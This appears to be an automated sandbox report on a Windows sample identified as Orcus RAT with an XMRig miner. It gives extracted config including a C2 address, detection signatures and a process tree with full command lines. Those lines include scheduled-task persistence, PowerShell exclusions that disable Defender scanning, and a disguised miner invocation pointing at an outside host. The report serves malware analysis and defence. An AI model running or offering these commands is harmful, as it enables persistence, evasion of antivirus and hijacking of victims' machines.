Analysis
- max time kernel: 141s
- max time network: 188s
- platform: windows7_x64
- resource: win7v20210410
- submitted: 17-07-2021 07:52
Static task: static1
Behavioral task: behavioral1
Sample: a71f91351dc1bb57f0426080f2c03854.exe
Resource: win7v20210410
General
- Target: a71f91351dc1bb57f0426080f2c03854.exe
- Size: 8.4MB
- MD5: a71f91351dc1bb57f0426080f2c03854
- SHA1: a336bd9298b0772f4d5764f695335fc7ef99755b
- SHA256: f95e19a66cb1e3a612f2c07380376196e856dfefbe1038c4e6fd7d6a03388b5d
- SHA512: dff5db2f6b3af11d10cb25c6e9df6df5bd4668ff54ba4ff1b6456ee7ab338e59297bad4d8722e7da15d175eabcd5833a632e5d62970d04993c733c379b7f4d19
Malware Config
Extracted
- family: orcus
- NewVPREFinal
- 67.242.2.35:10134
- 8185e643b7514e15b8dcfc7df7a8733b
- autostart_method: TaskScheduler
- enable_keylogger: true
- install_path: %systemroot%\lsddsds\lsdds.exe
- reconnect_delay: 10000
- registry_keyname: lsd
- taskscheduler_taskname: lsdds
- watchdog_path: Temp\olsdd.exe
Signatures
Orcus Main Payload 3 IoCs
Processes:
- resource: C:\Users\Admin\AppData\Local\Temp\CriticalProcess\Obus.exe; yara_rule: family_orcus
- resource: C:\Users\Admin\AppData\Local\Temp\CriticalProcess\Obus.exe; yara_rule: family_orcus
- resource: \Users\Admin\AppData\Local\Temp\CriticalProcess\Obus.exe; yara_rule: family_orcus
Looks for VirtualBox Guest Additions in registry 2 TTPs
Orcus Rat Executable 3 IoCs
Processes:
- resource: C:\Users\Admin\AppData\Local\Temp\CriticalProcess\Obus.exe; yara_rule: orcus
- resource: C:\Users\Admin\AppData\Local\Temp\CriticalProcess\Obus.exe; yara_rule: orcus
- resource: \Users\Admin\AppData\Local\Temp\CriticalProcess\Obus.exe; yara_rule: orcus
XMRig Miner Payload 1 IoCs
Processes:
- resource: behavioral1/memory/1504-302-0x00000001402EB66C-mapping.dmp; yara_rule: xmrig
Executes dropped EXE 20 IoCs
Processes:
- pid 1748: python.exe
- pid 1196: dcbl.exe
- pid 1328: ex.exe
- pid 1340: ec.exe
- pid 1492: frefef.exe
- pid 1512: Vu.exe
- pid 1740: python.exe
- pid 820: Obus.exe
- pid 2956: defendernottray.exe
- pid 2996: trayfontdefender.exe
- pid 2948: sihost64.exe
- pid 2180: sihost32.exe
- pid 1572: WindowsInput.exe
- pid 1140: WindowsInput.exe
- pid 2416: lsdds.exe
- pid 2692: lsdds.exe
- pid 2280: olsdd.exe
- pid 1888: olsdd.exe
- pid 1520: asasasas.exe
- pid 2376: defendernottray.exe
Looks for VMWare Tools registry key 2 TTPs
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion; process: frefef.exe
Loads dropped DLL 16 IoCs
Processes (repeated identical entries collapsed, count in parentheses):
- pid 1304: a71f91351dc1bb57f0426080f2c03854.exe (x6)
- pid 1748: python.exe
- pid 1304: a71f91351dc1bb57f0426080f2c03854.exe
- pid 1740: python.exe
- pid 1328: ex.exe
- pid 1340: ec.exe
- pid 2956: defendernottray.exe
- pid 2996: trayfontdefender.exe
- pid 2280: olsdd.exe
- pid 2068: cmd.exe
- pid 2948: sihost64.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
Legitimate hosting services abused for malware hosting/C2 1 TTPs
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
- flow 9: ip-api.com
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
Processes:
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum; process: frefef.exe
- Key value queried: \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0; process: frefef.exe
Drops file in System32 directory 22 IoCs
Processes:
- File created: \??\c:\windows\system32\microsoft\libs\sihost64.exe; process: defendernottray.exe
- File created: \??\c:\windows\system32\microsoft\telemetry\sihost32.exe; process: trayfontdefender.exe
- File created: C:\Windows\SysWOW64\WindowsInput.exe.config; process: Obus.exe
- File opened for modification: \??\c:\windows\system32\defendernottray.exe; process: sihost64.exe
- File opened for modification: \??\c:\windows\system32\trayfontdefender.exe; process: ec.exe
- File opened for modification: \??\c:\windows\system32\defendernottray.exe; process: ex.exe
- File opened for modification: C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk; process: powershell.exe
- File opened for modification: C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk; process: powershell.exe
- File created: \??\c:\windows\system32\microsoft\telemetry\sihost32.log; process: trayfontdefender.exe
- File opened for modification: C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk; process: powershell.exe
- File created: \??\c:\windows\system32\trayfontdefender.exe; process: ec.exe
- File opened for modification: C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk; process: powershell.exe
- File opened for modification: C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk; process: powershell.exe
- File opened for modification: C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk; process: powershell.exe
- File created: \??\c:\windows\system32\microsoft\libs\sihost64.log; process: defendernottray.exe
- File created: C:\Windows\SysWOW64\WindowsInput.exe; process: Obus.exe
- File created: C:\Windows\SysWOW64\WindowsInput.InstallState; process: WindowsInput.exe
- File created: \??\c:\windows\system32\defendernottray.exe; process: ex.exe
- File opened for modification: C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk; process: powershell.exe
- File created: \??\c:\windows\system32\microsoft\libs\WR64.sys; process: defendernottray.exe
- File opened for modification: C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk; process: powershell.exe
- File opened for modification: C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk; process: powershell.exe
Suspicious use of SetThreadContext 1 IoCs
Processes:
- description: PID 2956 set thread context of 1504; pid: 2956; process: defendernottray.exe; target process: explorer.exe
Drops file in Windows directory 3 IoCs
Processes:
- File created: C:\Windows\lsddsds\lsdds.exe; process: Obus.exe
- File opened for modification: C:\Windows\lsddsds\lsdds.exe; process: Obus.exe
- File created: C:\Windows\lsddsds\lsdds.exe.config; process: Obus.exe
Detects Pyinstaller 5 IoCs
Processes:
- resource: \Users\Admin\AppData\Local\Temp\python\python.exe; yara_rule: pyinstaller
- resource: C:\Users\Admin\AppData\Local\Temp\python\python.exe; yara_rule: pyinstaller
- resource: C:\Users\Admin\AppData\Local\Temp\python\python.exe; yara_rule: pyinstaller
- resource: \Users\Admin\AppData\Local\Temp\python\python.exe; yara_rule: pyinstaller
- resource: C:\Users\Admin\AppData\Local\Temp\python\python.exe; yara_rule: pyinstaller
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Program crash 1 IoCs
Processes:
- pid: 1620; pid_target: 1492; process: WerFault.exe; target process: frefef.exe
Checks SCSI registry key(s) 3 TTPs 1 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_VMware_&Prod_VMware_Virtual_S; process: frefef.exe
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString; process: frefef.exe
- Key opened: \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0; process: Vu.exe
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier; process: Vu.exe
- Key opened: \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0; process: frefef.exe
Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
- pid 2416: schtasks.exe
- pid 2828: schtasks.exe
- pid 2884: schtasks.exe
- pid 2912: schtasks.exe
- pid 2916: schtasks.exe
Delays execution with timeout.exe 1 IoCs
Processes:
- pid 2448: timeout.exe
Enumerates system info in registry 2 TTPs 4 IoCs
Processes:
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosInformation; process: frefef.exe
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemManufacturer; process: frefef.exe
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemProductName; process: frefef.exe
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Logical Unit Id 0; process: frefef.exe
Modifies system certificate store
Processes:
- Set value (data): \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = (certificate blob omitted); process: defendernottray.exe
- Key created: \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13; process: frefef.exe
- Set value (data): \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = (certificate blob omitted); process: frefef.exe
- Key created: \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25; process: defendernottray.exe
- Set value (data): \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = (certificate blob omitted); process: defendernottray.exe
- Set value (data): \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = (certificate blob omitted); process: defendernottray.exe
Runs ping.exe 1 TTPs 1 IoCs
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes (repeated identical entries collapsed, count in parentheses):
- pid 796: powershell.exe
- pid 1880: powershell.exe
- pid 796: powershell.exe
- pid 1880: powershell.exe
- pid 1512: Vu.exe (x3)
- pid 2536: powershell.exe
- pid 2636: powershell.exe
- pid 2536: powershell.exe
- pid 2636: powershell.exe
- pid 1340: ec.exe
- pid 1328: ex.exe
- pid 2216: powershell.exe
- pid 1824: powershell.exe
- pid 2216: powershell.exe
- pid 1824: powershell.exe
- pid 1136: powershell.exe
- pid 2172: powershell.exe
- pid 1136: powershell.exe
- pid 1620: WerFault.exe (x7)
- pid 2172: powershell.exe
- pid 2840: powershell.exe
- pid 2856: powershell.exe
- pid 2840: powershell.exe
- pid 2956: defendernottray.exe
- pid 2856: powershell.exe
- pid 2996: trayfontdefender.exe
- pid 2068: cmd.exe (x2)
- pid 2240: powershell.exe (x2)
- pid 2316: powershell.exe
- pid 2604: powershell.exe
- pid 2316: powershell.exe
- pid 2604: powershell.exe
- pid 2800: powershell.exe
- pid 2624: powershell.exe
- pid 2800: powershell.exe
- pid 2624: powershell.exe
- pid 1888: olsdd.exe (x2)
- pid 2416: lsdds.exe (x3)
- pid 1888: olsdd.exe
- pid 2416: lsdds.exe
- pid 1888: olsdd.exe
- pid 2416: lsdds.exe
- pid 1888: olsdd.exe
- pid 1196: dcbl.exe
- pid 2416: lsdds.exe
- pid 1888: olsdd.exe
- pid 2416: lsdds.exe
- pid 1888: olsdd.exe
- pid 2416: lsdds.exe
- pid 1888: olsdd.exe
- pid 2416: lsdds.exe
Suspicious use of AdjustPrivilegeToken 32 IoCs
Processes:
- Token: SeDebugPrivilege; pid 1512: Vu.exe
- Token: SeDebugPrivilege; pid 1492: frefef.exe
- Token: SeDebugPrivilege; pid 796: powershell.exe
- Token: SeDebugPrivilege; pid 1880: powershell.exe
- Token: SeDebugPrivilege; pid 2536: powershell.exe
- Token: SeDebugPrivilege; pid 2636: powershell.exe
- Token: SeDebugPrivilege; pid 1340: ec.exe
- Token: SeDebugPrivilege; pid 1328: ex.exe
- Token: SeDebugPrivilege; pid 2216: powershell.exe
- Token: SeDebugPrivilege; pid 1824: powershell.exe
- Token: SeDebugPrivilege; pid 1136: powershell.exe
- Token: SeDebugPrivilege; pid 2172: powershell.exe
- Token: SeDebugPrivilege; pid 1620: WerFault.exe
- Token: SeDebugPrivilege; pid 2840: powershell.exe
- Token: SeDebugPrivilege; pid 2856: powershell.exe
- Token: SeDebugPrivilege; pid 2956: defendernottray.exe
- Token: SeDebugPrivilege; pid 2996: trayfontdefender.exe
- Token: SeDebugPrivilege; pid 2068: cmd.exe
- Token: SeDebugPrivilege; pid 2240: powershell.exe
- Token: SeDebugPrivilege; pid 2316: powershell.exe
- Token: SeDebugPrivilege; pid 2604: powershell.exe
- Token: SeDebugPrivilege; pid 2800: powershell.exe
- Token: SeDebugPrivilege; pid 2624: powershell.exe
- Token: SeLockMemoryPrivilege; pid 1504: explorer.exe
- Token: SeLockMemoryPrivilege; pid 1504: explorer.exe
- Token: SeDebugPrivilege; pid 2416: lsdds.exe
- Token: SeDebugPrivilege; pid 2280: olsdd.exe
- Token: SeDebugPrivilege; pid 1888: olsdd.exe
- Token: SeDebugPrivilege; pid 1196: dcbl.exe
- Token: SeDebugPrivilege; pid 1520: asasasas.exe
- Token: SeDebugPrivilege; pid 1520: asasasas.exe
- Token: SeDebugPrivilege; pid 2304: powershell.exe
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
- pid 2416: lsdds.exe
Suspicious use of SendNotifyMessage 1 IoCs
Processes:
- pid 2416: lsdds.exe
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
- pid 2416: lsdds.exe
Suspicious use of WriteProcessMemory 64 IoCs
Processes (repeated identical entries collapsed, count in parentheses):
- PID 1304 wrote to memory of 1748; process: a71f91351dc1bb57f0426080f2c03854.exe; target process: python.exe (x4)
- PID 1304 wrote to memory of 1196; process: a71f91351dc1bb57f0426080f2c03854.exe; target process: dcbl.exe (x4)
- PID 1304 wrote to memory of 1328; process: a71f91351dc1bb57f0426080f2c03854.exe; target process: ex.exe (x4)
- PID 1304 wrote to memory of 1340; process: a71f91351dc1bb57f0426080f2c03854.exe; target process: ec.exe (x4)
- PID 1304 wrote to memory of 1492; process: a71f91351dc1bb57f0426080f2c03854.exe; target process: frefef.exe (x4)
- PID 1304 wrote to memory of 1512; process: a71f91351dc1bb57f0426080f2c03854.exe; target process: Vu.exe (x4)
- PID 1748 wrote to memory of 1740; process: python.exe; target process: python.exe (x3)
- PID 1304 wrote to memory of 820; process: a71f91351dc1bb57f0426080f2c03854.exe; target process: Obus.exe (x4)
- PID 1328 wrote to memory of 864; process: ex.exe; target process: cmd.exe (x3)
- PID 1340 wrote to memory of 324; process: ec.exe; target process: cmd.exe (x3)
- PID 864 wrote to memory of 1880; process: cmd.exe; target process: powershell.exe (x3)
- PID 324 wrote to memory of 796; process: cmd.exe; target process: powershell.exe (x3)
- PID 1512 wrote to memory of 2172; process: Vu.exe; target process: powershell.exe (x3)
- PID 2172 wrote to memory of 2264; process: powershell.exe; target process: cmd.exe (x3)
- PID 2172 wrote to memory of 2312; process: powershell.exe; target process: netsh.exe (x3)
- PID 864 wrote to memory of 2536; process: cmd.exe; target process: powershell.exe (x3)
- PID 1512 wrote to memory of 2588; process: Vu.exe; target process: cmd.exe (x3)
- PID 2588 wrote to memory of 2624; process: cmd.exe; target process: powershell.exe (x3)
- PID 324 wrote to memory of 2636; process: cmd.exe; target process: powershell.exe (x3)
Processes (indented by depth in the process tree; level shown in parentheses)
C:\Users\Admin\AppData\Local\Temp\a71f91351dc1bb57f0426080f2c03854.exe (level 1)
  command line: "C:\Users\Admin\AppData\Local\Temp\a71f91351dc1bb57f0426080f2c03854.exe"
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  C:\Users\Admin\AppData\Local\Temp\python\python.exe (level 2)
    command line: "C:\Users\Admin\AppData\Local\Temp\python\python.exe"
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    C:\Users\Admin\AppData\Local\Temp\python\python.exe (level 3)
      command line: "C:\Users\Admin\AppData\Local\Temp\python\python.exe"
      - Executes dropped EXE
      - Loads dropped DLL
  C:\Users\Admin\AppData\Local\Temp\AudioOutM\dcbl.exe (level 2)
    command line: "C:\Users\Admin\AppData\Local\Temp\AudioOutM\dcbl.exe"
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    C:\Windows\SysWOW64\cmd.exe (level 3)
      command line: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "asasasas" /tr '"C:\Users\Admin\AppData\Local\Temp\asasasas.exe"' & exit
      C:\Windows\SysWOW64\schtasks.exe (level 4)
        command line: schtasks /create /f /sc onlogon /rl highest /tn "asasasas" /tr '"C:\Users\Admin\AppData\Local\Temp\asasasas.exe"'
        - Creates scheduled task(s)
    C:\Windows\SysWOW64\cmd.exe (level 3)
      command line: cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmpFB5F.tmp.bat""
      - Loads dropped DLL
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      C:\Windows\SysWOW64\timeout.exe (level 4)
        command line: timeout 3
        - Delays execution with timeout.exe
      C:\Users\Admin\AppData\Local\Temp\asasasas.exe (level 4)
        command line: "C:\Users\Admin\AppData\Local\Temp\asasasas.exe"
        - Executes dropped EXE
        - Suspicious use of AdjustPrivilegeToken
  C:\Users\Admin\AppData\Local\Temp\SecurityTrayManager\ex.exe (level 2)
    command line: "C:\Users\Admin\AppData\Local\Temp\SecurityTrayManager\ex.exe"
    - Executes dropped EXE
    - Loads dropped DLL
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\cmd.exe (level 3)
      command line: "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
      - Suspicious use of WriteProcessMemory
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (level 4)
        command line: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (level 4)
        command line: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (level 4)
        command line: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (level 4)
        command line: powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
    C:\Windows\System32\cmd.exe (level 3)
      command line: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "defendernottray" /tr '"c:\windows\system32\defendernottray.exe"' & exit
      C:\Windows\system32\schtasks.exe (level 4)
        command line: schtasks /create /f /sc onlogon /rl highest /tn "defendernottray" /tr '"c:\windows\system32\defendernottray.exe"'
        - Creates scheduled task(s)
    C:\windows\system32\defendernottray.exe (level 3)
      command line: "C:\windows\system32\defendernottray.exe"
      - Executes dropped EXE
      - Loads dropped DLL
      - Drops file in System32 directory
      - Suspicious use of SetThreadContext
      - Modifies system certificate store
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      C:\windows\system32\cmd.exe (level 4)
        command line: "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (level 5)
          command line: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
          - Drops file in System32 directory
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (level 5)
          command line: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
          - Drops file in System32 directory
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (level 5)
          command line: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
          - Drops file in System32 directory
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (level 5)
          command line: powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
          - Drops file in System32 directory
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
      C:\Windows\System32\cmd.exe (level 4)
        command line: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "defendernottray" /tr '"c:\windows\system32\defendernottray.exe"' & exit
        \??\c:\windows\system32\schtasks.exe (level 5)
          command line: schtasks /create /f /sc onlogon /rl highest /tn "defendernottray" /tr '"c:\windows\system32\defendernottray.exe"'
          - Creates scheduled task(s)
      C:\windows\system32\microsoft\libs\sihost64.exe (level 4)
        command line: "C:\windows\system32\microsoft\libs\sihost64.exe"
        - Executes dropped EXE
        - Loads dropped DLL
        - Drops file in System32 directory
        C:\windows\system32\defendernottray.exe (level 5)
          command line: "C:\windows\system32\defendernottray.exe"
          - Executes dropped EXE
          C:\windows\system32\cmd.exe (level 6)
            command line: "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (level 7)
              command line: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
              - Drops file in System32 directory
              - Suspicious use of AdjustPrivilegeToken
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (level 7)
              command line: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (level 7)
              command line: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (level 7)
              command line: powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
      C:\Windows\explorer.exe (level 4)
        command line: C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=67.242.2.35:3333 --user=CMRBKYMNO --pass= --cpu-max-threads-hint=70 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6CJ80EuZhDq7w3QiPw3/9PYjASC1sXGu0nCxs9jooG2T" --cinit-idle-wait=12 --cinit-idle-cpu=90 --nicehash --cinit-stealth
        - Suspicious use of AdjustPrivilegeToken
  C:\Users\Admin\AppData\Local\Temp\WindowsDefenderHelper\ec.exe (level 2)
    command line: "C:\Users\Admin\AppData\Local\Temp\WindowsDefenderHelper\ec.exe"
    - Executes dropped EXE
    - Loads dropped DLL
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\cmd.exe (level 3)
      command line: "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
      - Suspicious use of WriteProcessMemory
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (level 4)
        command line: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (level 4)
        command line: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (level 4)
        command line: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (level 4)
        command line: powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
    C:\Windows\System32\cmd.exe (level 3)
      command line: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "trayfontdefender" /tr '"c:\windows\system32\trayfontdefender.exe"' & exit
      C:\Windows\system32\schtasks.exe (level 4)
        command line: schtasks /create /f /sc onlogon /rl highest /tn "trayfontdefender" /tr '"c:\windows\system32\trayfontdefender.exe"'
        - Creates scheduled task(s)
    C:\windows\system32\trayfontdefender.exe (level 3)
      command line: "C:\windows\system32\trayfontdefender.exe"
      - Executes dropped EXE
      - Loads dropped DLL
      - Drops file in System32 directory
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      C:\windows\system32\cmd.exe (level 4)
        command line: "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (level 5)
          command line: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
          - Drops file in System32 directory
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (level 5)
          command line: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
          - Drops file in System32 directory
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (level 5)
          command line: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
          - Drops file in System32 directory
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (level 5)
          command line: powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
          - Drops file in System32 directory
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
      C:\Windows\System32\cmd.exe (level 4)
        command line: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "trayfontdefender" /tr '"c:\windows\system32\trayfontdefender.exe"' & exit
        \??\c:\windows\system32\schtasks.exe (level 5)
          command line: schtasks /create /f /sc onlogon /rl highest /tn "trayfontdefender" /tr '"c:\windows\system32\trayfontdefender.exe"'
          - Creates scheduled task(s)
      C:\windows\system32\microsoft\telemetry\sihost32.exe (level 4)
        command line: "C:\windows\system32\microsoft\telemetry\sihost32.exe"
        - Executes dropped EXE
  C:\Users\Admin\AppData\Local\Temp\CriticalProcess\Obus.exe (level 2)
    command line: "C:\Users\Admin\AppData\Local\Temp\CriticalProcess\Obus.exe"
    - Executes dropped EXE
    - Drops file in System32 directory
    - Drops file in Windows directory
    C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe (level 3)
      command line: "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vorxrfpg.cmdline"
      C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe (level 4)
        command line: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE5DD.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCE5DC.tmp"
